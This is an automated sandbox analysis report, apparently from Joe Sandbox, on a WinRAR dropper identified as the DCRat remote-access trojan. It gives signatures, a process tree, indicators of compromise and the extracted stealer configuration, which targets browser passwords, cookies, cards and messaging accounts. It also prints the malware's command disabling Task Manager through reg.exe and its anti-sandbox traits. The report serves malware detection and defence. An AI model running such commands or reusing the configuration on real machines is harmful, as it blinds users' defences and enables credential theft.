

Windows Analysis Report
loader.exe

Overview

General Information

Sample name: loader.exe
Analysis ID: 1542823
MD5: f462fd11ceda48487db07c5b70410dac
SHA1: 48010b409ab20a6a51e562d347b87abcb15dd9fe
SHA256: 4139522809118bba10441242323550ef8f00264e862a5403dab48c1c5c8ad654
Tags: exe user-aachum

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • loader.exe (PID: 6432 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: F462FD11CEDA48487DB07C5B70410DAC)
    • wscript.exe (PID: 6552 cmdline: "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6916 cmdline: C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • containercomponentSaves.exe (PID: 7008 cmdline: "C:\blockcomwinsavescrt\containercomponentSaves.exe" MD5: 59E330F176AE037DCC65EFC5F7D7859A)
        • reg.exe (PID: 3720 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
Malware Configuration (DCRat, extracted from process memory):
{"SCRT": "{\"1\":\">\",\"v\":\".\",\"J\":\"|\",\"I\":\"$\",\"h\":\"^\",\"k\":\"%\",\"j\":\"<\",\"m\":\"(\",\"9\":\"_\",\"0\":\"#\",\"S\":\" \",\"o\":\"-\",\"c\":\";\",\"3\":\"*\",\"N\":\"~\",\"i\":\"&\",\"w\":\")\",\"M\":\",\",\"l\":\"@\",\"O\":\"!\",\"R\":\"`\"}", "PCRT": "{\"R\":\"(\",\"0\":\";\",\"J\":\"-\",\"B\":\"!\",\"V\":\"|\",\"Y\":\"&\",\"H\":\">\",\"m\":\"_\",\"d\":\",\",\"T\":\" \",\"r\":\"~\",\"x\":\"<\",\"Q\":\".\",\"l\":\"$\",\"1\":\")\",\"h\":\"*\",\"p\":\"@\",\"n\":\"#\",\"U\":\"^\",\"3\":\"`\",\"C\":\"%\"}", "TAG": "", "MUTEX": "DCR_MUTEX-9cBVMnkcjsA8jrBBUcH3", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 2, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%SystemDrive% - Slow"}, "AS": true, "ASO": false, "AD": false}
Yara Overview (Source | Rule | Description | Author | Strings)

Source: 00000004.00000002.1832418118.0000000013067000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_DCRat_1 | Description: Yara detected DCRat | Author: Joe Security
Source: 00000004.00000002.1832051997.0000000002F11000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_DCRat_1 | Description: Yara detected DCRat | Author: Joe Security
Source: Process Memory Space: containercomponentSaves.exe PID: 7008 | Rule: JoeSecurity_DCRat_1 | Description: Yara detected DCRat | Author: Joe Security
Source: 4.2.containercomponentSaves.exe.2f62ec8.1.raw.unpack | Rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded | Description: Detects executables referencing many base64-encoded IR and analysis tools names | Author: ditekSHen | Strings:
  • 0x164ec:$s4: cHJvY2V4cA
  • 0x16e34:$s4: cHJvY2V4cA
  • 0x1652d:$s5: cHJvY2V4cDY0
  • 0x16e75:$s5: cHJvY2V4cDY0
  • 0x16429:$s12: d2lyZXNoYXJr
  • 0x16d71:$s12: d2lyZXNoYXJr
  • 0x162d2:$s23: ZG5zcHk
  • 0x16c1a:$s23: ZG5zcHk
  • 0x162db:$s25: aWxzcHk
  • 0x16c23:$s25: aWxzcHk
  • 0x162e4:$s26: ZG90cGVla
  • 0x16c2c:$s26: ZG90cGVla

        System Summary

Sigma rule match: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe", CommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 6432, ParentProcessName: loader.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe", ProcessId: 6552, ProcessName: wscript.exe
        No Suricata rule has matched

        AV Detection

Source: loader.exe | Avira: detected
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: 00000004.00000002.1832418118.0000000013067000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"1\":\">\",\"v\":\".\",\"J\":\"|\",\"I\":\"$\",\"h\":\"^\",\"k\":\"%\",\"j\":\"<\",\"m\":\"(\",\"9\":\"_\",\"0\":\"#\",\"S\":\" \",\"o\":\"-\",\"c\":\";\",\"3\":\"*\",\"N\":\"~\",\"i\":\"&\",\"w\":\")\",\"M\":\",\",\"l\":\"@\",\"O\":\"!\",\"R\":\"`\"}", "PCRT": "{\"R\":\"(\",\"0\":\";\",\"J\":\"-\",\"B\":\"!\",\"V\":\"|\",\"Y\":\"&\",\"H\":\">\",\"m\":\"_\",\"d\":\",\",\"T\":\" \",\"r\":\"~\",\"x\":\"<\",\"Q\":\".\",\"l\":\"$\",\"1\":\")\",\"h\":\"*\",\"p\":\"@\",\"n\":\"#\",\"U\":\"^\",\"3\":\"`\",\"C\":\"%\"}", "TAG": "", "MUTEX": "DCR_MUTEX-9cBVMnkcjsA8jrBBUcH3", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 2, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%SystemDrive% - Slow"}, "AS": true, "ASO": false, "AD": false}
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | ReversingLabs: Detection: 84%
Source: loader.exe | ReversingLabs: Detection: 70%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.8% probability
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Joe Sandbox ML: detected
Source: loader.exe | Joe Sandbox ML: detected
Source: loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: loader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: loader.exe
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: unknown | DNS query: name: ip-api.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030B8000.00000004.00000800.00020000.00000000.sdmp, containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: containercomponentSaves.exe, 00000004.00000002.1832051997.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: containercomponentSaves.exe, 00000004.00000002.1832051997.00000000030AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

        System Summary

Source: 4.2.containercomponentSaves.exe.2f62ec8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010857B
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0012D00E
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010407E
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_001170BF
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00131194
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00103281
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010E2A0
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_001202F6
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00116646
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0012070E
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0012473A
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_001137C1
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_001027E8
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010E8A0
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010F968
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00124969
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00113A3C
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00116A7B
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00120B43
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0012CB60
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00115C77
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010ED14
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00113D6D
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0011FDFA
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010BE13
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_0010DE6C
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00105F3C
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00120F78
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Code function: 4_2_00007FFD9B9E3595
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Code function: 4_2_00007FFD9B9ECD48
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Code function: 4_2_00007FFD9B9ECD09
Source: C:\Users\user\Desktop\loader.exe | Code function: String function: 0011ED00 appears 31 times
Source: C:\Users\user\Desktop\loader.exe | Code function: String function: 0011E360 appears 52 times
Source: C:\Users\user\Desktop\loader.exe | Code function: String function: 0011E28C appears 35 times
Source: containercomponentSaves.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: loader.exe, 00000000.00000002.1710718170.0000000002F46000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs loader.exe
Source: loader.exe, 00000000.00000002.1710718170.0000000002F46000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs loader.exe
Source: loader.exe, 00000000.00000003.1709378737.0000000002F46000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs loader.exe
Source: loader.exe, 00000000.00000003.1709378737.0000000002F46000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs loader.exe
Source: loader.exe, 00000000.00000003.1706248768.00000000052C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs loader.exe
Source: loader.exe, 00000000.00000003.1707087184.0000000005247000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs loader.exe
Source: loader.exe | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs loader.exe
Source: loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: 4.2.containercomponentSaves.exe.2f62ec8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
Source: containercomponentSaves.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, e12nGA4j2K57ImO696x.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, r7ARBUU6KQplkvN1o3h.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, r7ARBUU6KQplkvN1o3h.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, e12nGA4j2K57ImO696x.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, r7ARBUU6KQplkvN1o3h.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, r7ARBUU6KQplkvN1o3h.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.containercomponentSaves.exe.2f62ec8.1.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.containercomponentSaves.exe.1b840000.2.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, XRvakYPisYbwnI0BclJ.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, XRvakYPisYbwnI0BclJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, XRvakYPisYbwnI0BclJ.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.loader.exe.6988fc4.0.raw.unpack, XRvakYPisYbwnI0BclJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@11/4@1/1
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00106EC9 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\loader.exe | Code function: 0_2_00119E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\containercomponentSaves.exe.log
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Mutant created: NULL
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\e775887669f4fbb7226aa280db726666d333fd67
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" "
Source: C:\Users\user\Desktop\loader.exe | Command line argument: sfxname (0_2_0011D5D4)
Source: C:\Users\user\Desktop\loader.exe | Command line argument: sfxstime (0_2_0011D5D4)
Source: C:\Users\user\Desktop\loader.exe | Command line argument: STARTDLG (0_2_0011D5D4)
Source: loader.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: loader.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\loader.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\loader.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\loader.exe | File read: C:\Users\user\Desktop\loader.exe
Source: unknown | Process created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\blockcomwinsavescrt\containercomponentSaves.exe "C:\blockcomwinsavescrt\containercomponentSaves.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Users\user\Desktop\loader.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: policymanager.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\loader.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: mscoree.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: apphelp.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: kernel.appcore.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: version.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: uxtheme.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: windows.storage.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: wldp.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: profapi.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: cryptsp.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: rsaenh.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: cryptbase.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: sspicli.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: amsi.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: userenv.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: wbemcomn.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: rasapi32.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: rasman.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: rtutils.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: mswsock.dll
Source: C:\blockcomwinsavescrt\containercomponentSaves.exe | Section loaded: winhttp.dll
